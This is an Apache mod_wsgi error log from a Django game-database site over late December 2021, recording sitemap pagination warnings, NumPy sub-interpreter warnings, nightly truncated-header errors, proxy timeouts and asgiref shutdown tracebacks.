[Fri Dec 17 08:37:24.907087 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Fri Dec 17 08:37:24.907130 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 00:00:06.721174 2021] [wsgi:error] [pid 412111:tid 140024221775616] [client 206.189.33.118:34690] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Dec 18 00:01:04.177627 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 54.36.149.38:62967] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sat Dec 18 00:01:04.177688 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 54.36.149.38:62967] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sat Dec 18 00:01:04.177695 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 54.36.149.38:62967]   __import__(dependency)
[Sat Dec 18 03:05:42.527090 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Sat Dec 18 03:05:42.528979 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 03:05:42.880842 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Sat Dec 18 03:05:42.880887 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 03:05:43.200721 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Sat Dec 18 03:05:43.200767 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 03:05:45.877521 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Sat Dec 18 03:05:45.877585 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 03:05:45.914577 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Sat Dec 18 03:05:45.914622 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 18 03:05:46.100038 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Sat Dec 18 03:05:46.100088 2021] [wsgi:error] [pid 432301:tid 140024507725568] [remote 142.132.139.168:53543]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 00:00:07.349801 2021] [wsgi:error] [pid 432347:tid 140024322422528] [client 206.189.33.118:55346] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sun Dec 19 00:00:12.861612 2021] [wsgi:error] [pid 450385:tid 140024507725568] [remote 138.201.31.122:4487] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 19 00:00:12.861660 2021] [wsgi:error] [pid 450385:tid 140024507725568] [remote 138.201.31.122:4487] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 19 00:00:12.861664 2021] [wsgi:error] [pid 450385:tid 140024507725568] [remote 138.201.31.122:4487]   __import__(dependency)
[Sun Dec 19 17:44:48.029563 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Sun Dec 19 17:44:48.031130 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 17:44:48.299506 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Sun Dec 19 17:44:48.299549 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 17:44:48.609779 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Sun Dec 19 17:44:48.609856 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 17:44:51.437826 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Sun Dec 19 17:44:51.437878 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 17:44:51.473044 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Sun Dec 19 17:44:51.473084 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 19 17:44:51.545689 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Sun Dec 19 17:44:51.545742 2021] [wsgi:error] [pid 450385:tid 140024415405824] [remote 66.249.75.22:50906]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 20 00:00:07.925552 2021] [wsgi:error] [pid 450396:tid 140023819122432] [client 206.189.33.118:52534] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Dec 20 00:00:57.289412 2021] [wsgi:error] [pid 480832:tid 140024507725568] [remote 54.36.148.215:49589] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 20 00:00:57.289461 2021] [wsgi:error] [pid 480832:tid 140024507725568] [remote 54.36.148.215:49589] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 20 00:00:57.289465 2021] [wsgi:error] [pid 480832:tid 140024507725568] [remote 54.36.148.215:49589]   __import__(dependency)
[Tue Dec 21 00:00:07.381887 2021] [wsgi:error] [pid 480844:tid 140024305637120] [client 206.189.33.118:46306] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Tue Dec 21 00:00:51.462585 2021] [wsgi:error] [pid 503924:tid 140024507725568] [remote 185.191.171.3:56910] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 21 00:00:51.462634 2021] [wsgi:error] [pid 503924:tid 140024507725568] [remote 185.191.171.3:56910] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 21 00:00:51.462652 2021] [wsgi:error] [pid 503924:tid 140024507725568] [remote 185.191.171.3:56910]   __import__(dependency)
[Tue Dec 21 05:41:59.747888 2021] [wsgi:error] [pid 504037:tid 140024381171456] (70007)The timeout specified has expired: [client 182.251.141.72:43243] mod_wsgi (pid=504037): Failed to proxy response to client., referer: https://seesaawiki.jp/
[Wed Dec 22 00:00:07.336564 2021] [wsgi:error] [pid 504036:tid 140024221775616] [client 206.189.33.118:48978] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Wed Dec 22 00:00:21.266838 2021] [wsgi:error] [pid 527950:tid 140024507725568] [remote 54.36.149.103:45331] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 00:00:21.266881 2021] [wsgi:error] [pid 527950:tid 140024507725568] [remote 54.36.149.103:45331] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 00:00:21.266885 2021] [wsgi:error] [pid 527950:tid 140024507725568] [remote 54.36.149.103:45331]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f737ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:22:44.895247 2021] [wsgi:error] [pid 533710:tid 140024507725568] [remote 157.55.39.6:38784] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:22:44.895312 2021] [wsgi:error] [pid 533710:tid 140024507725568] [remote 157.55.39.6:38784] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:22:44.895319 2021] [wsgi:error] [pid 533710:tid 140024507725568] [remote 157.55.39.6:38784]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7376c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:26:06.375624 2021] [wsgi:error] [pid 534649:tid 140024507725568] [remote 27.138.98.98:61253] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:26:06.375676 2021] [wsgi:error] [pid 534649:tid 140024507725568] [remote 27.138.98.98:61253] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:26:06.375680 2021] [wsgi:error] [pid 534649:tid 140024507725568] [remote 27.138.98.98:61253]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7375c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:26:42.267704 2021] [wsgi:error] [pid 535823:tid 140024507623168] [remote 185.191.171.43:38814] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:26:42.267754 2021] [wsgi:error] [pid 535823:tid 140024507623168] [remote 185.191.171.43:38814] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:26:42.267758 2021] [wsgi:error] [pid 535823:tid 140024507623168] [remote 185.191.171.43:38814]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7371c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:27:26.891535 2021] [wsgi:error] [pid 536227:tid 140024507623168] [remote 27.138.98.98:61345] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:27:26.891603 2021] [wsgi:error] [pid 536227:tid 140024507623168] [remote 27.138.98.98:61345] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:27:26.891609 2021] [wsgi:error] [pid 536227:tid 140024507623168] [remote 27.138.98.98:61345]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7372c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:27:29.965672 2021] [wsgi:error] [pid 536241:tid 140024381171456] (2)No such file or directory: [client 27.138.98.98:61346] mod_wsgi (pid=536241): Unable to connect to WSGI daemon process 'django_jtos' on '/var/run/apache2/wsgi.826.53.5.sock' as user with uid=33., referer: https://jtos.tavernofsoul.com/
[Wed Dec 22 04:27:31.975962 2021] [wsgi:error] [pid 536626:tid 140024507623168] [remote 27.138.98.98:61350] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:27:31.976003 2021] [wsgi:error] [pid 536626:tid 140024507623168] [remote 27.138.98.98:61350] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:27:31.976007 2021] [wsgi:error] [pid 536626:tid 140024507623168] [remote 27.138.98.98:61350]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f736cc10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:27:34.017673 2021] [wsgi:error] [pid 536978:tid 140024507623168] [remote 27.138.98.98:61353] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:27:34.017724 2021] [wsgi:error] [pid 536978:tid 140024507623168] [remote 27.138.98.98:61353] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:27:34.017727 2021] [wsgi:error] [pid 536978:tid 140024507623168] [remote 27.138.98.98:61353]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f736ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:30:09.647677 2021] [wsgi:error] [pid 537350:tid 140024482445056] [remote 206.189.33.118:53952] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:30:09.647734 2021] [wsgi:error] [pid 537350:tid 140024482445056] [remote 206.189.33.118:53952] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:30:09.647738 2021] [wsgi:error] [pid 537350:tid 140024482445056] [remote 206.189.33.118:53952]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7367c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 22 04:45:09.105673 2021] [wsgi:error] [pid 538121:tid 140024499230464] [remote 206.189.33.118:54164] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 22 04:45:09.105727 2021] [wsgi:error] [pid 538121:tid 140024499230464] [remote 206.189.33.118:54164] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 22 04:45:09.105731 2021] [wsgi:error] [pid 538121:tid 140024499230464] [remote 206.189.33.118:54164]   __import__(dependency)
[Thu Dec 23 00:00:08.061728 2021] [wsgi:error] [pid 538452:tid 140024322422528] [client 206.189.33.118:46474] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Thu Dec 23 00:00:16.933883 2021] [wsgi:error] [pid 553880:tid 140024507623168] [remote 54.36.148.41:56379] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Thu Dec 23 00:00:16.933946 2021] [wsgi:error] [pid 553880:tid 140024507623168] [remote 54.36.148.41:56379] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Thu Dec 23 00:00:16.933977 2021] [wsgi:error] [pid 553880:tid 140024507623168] [remote 54.36.148.41:56379]   __import__(dependency)
[Thu Dec 23 08:07:05.847031 2021] [wsgi:error] [pid 553893:tid 140024280459008] (70007)The timeout specified has expired: [client 211.135.102.204:53353] mod_wsgi (pid=553893): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Thu Dec 23 08:07:21.345537 2021] [wsgi:error] [pid 553893:tid 140024482445056] (70007)The timeout specified has expired: [client 211.135.102.204:53354] mod_wsgi (pid=553893): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Fri Dec 24 00:00:05.889741 2021] [wsgi:error] [pid 558715:tid 140023978452736] [client 206.189.33.118:45510] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Fri Dec 24 00:00:53.761856 2021] [wsgi:error] [pid 572590:tid 140024507623168] [remote 42.126.128.24:61456] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 24 00:00:53.761910 2021] [wsgi:error] [pid 572590:tid 140024507623168] [remote 42.126.128.24:61456] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 24 00:00:53.761915 2021] [wsgi:error] [pid 572590:tid 140024507623168] [remote 42.126.128.24:61456]   __import__(dependency)
[Fri Dec 24 21:13:15.667612 2021] [wsgi:error] [pid 584137:tid 140024045594368] (70007)The timeout specified has expired: [client 49.96.21.75:27796] mod_wsgi (pid=584137): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Sat Dec 25 00:00:07.875313 2021] [wsgi:error] [pid 584137:tid 140024490837760] [client 206.189.33.118:48524] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Dec 25 00:01:00.055960 2021] [wsgi:error] [pid 592175:tid 140024507623168] [remote 185.191.171.15:31738] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sat Dec 25 00:01:00.056020 2021] [wsgi:error] [pid 592175:tid 140024507623168] [remote 185.191.171.15:31738] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sat Dec 25 00:01:00.056027 2021] [wsgi:error] [pid 592175:tid 140024507623168] [remote 185.191.171.15:31738]   __import__(dependency)
[Sun Dec 26 00:00:07.900108 2021] [wsgi:error] [pid 592189:tid 140024246888192] [client 206.189.33.118:45668] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sun Dec 26 00:00:37.803279 2021] [wsgi:error] [pid 617154:tid 140024507623168] [remote 54.36.149.39:47089] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 26 00:00:37.803346 2021] [wsgi:error] [pid 617154:tid 140024507623168] [remote 54.36.149.39:47089] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 26 00:00:37.803350 2021] [wsgi:error] [pid 617154:tid 140024507623168] [remote 54.36.149.39:47089]   __import__(dependency)
[Mon Dec 27 00:00:06.449684 2021] [wsgi:error] [pid 617168:tid 140024465659648] [client 206.189.33.118:46758] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Dec 27 00:03:26.358987 2021] [wsgi:error] [pid 636279:tid 140024507623168] [remote 61.147.15.67:59914] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 27 00:03:26.359037 2021] [wsgi:error] [pid 636279:tid 140024507623168] [remote 61.147.15.67:59914] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 27 00:03:26.359043 2021] [wsgi:error] [pid 636279:tid 140024507623168] [remote 61.147.15.67:59914]   __import__(dependency)
[Mon Dec 27 13:35:43.336915 2021] [wsgi:error] [pid 636292:tid 140024381171456] (70007)The timeout specified has expired: [client 211.135.102.204:53978] mod_wsgi (pid=636292): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Mon Dec 27 13:35:45.521231 2021] [wsgi:error] [pid 636292:tid 140024272066304] (70007)The timeout specified has expired: [client 211.135.102.204:53979] mod_wsgi (pid=636292): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Tue Dec 28 00:00:07.365239 2021] [wsgi:error] [pid 636292:tid 140024255280896] [client 206.189.33.118:38594] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Tue Dec 28 00:02:17.868747 2021] [wsgi:error] [pid 656498:tid 140024507623168] [remote 185.191.171.16:31028] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 28 00:02:17.868794 2021] [wsgi:error] [pid 656498:tid 140024507623168] [remote 185.191.171.16:31028] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 28 00:02:17.868798 2021] [wsgi:error] [pid 656498:tid 140024507623168] [remote 185.191.171.16:31028]   __import__(dependency)
[Tue Dec 28 00:28:26.980130 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Tue Dec 28 00:28:26.980481 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 28 00:28:27.163344 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Tue Dec 28 00:28:27.163421 2021] [wsgi:error] [pid 656498:tid 140024390125312] [remote 185.191.171.12:64128]   return paginator.Paginator(self._items(), self.limit)
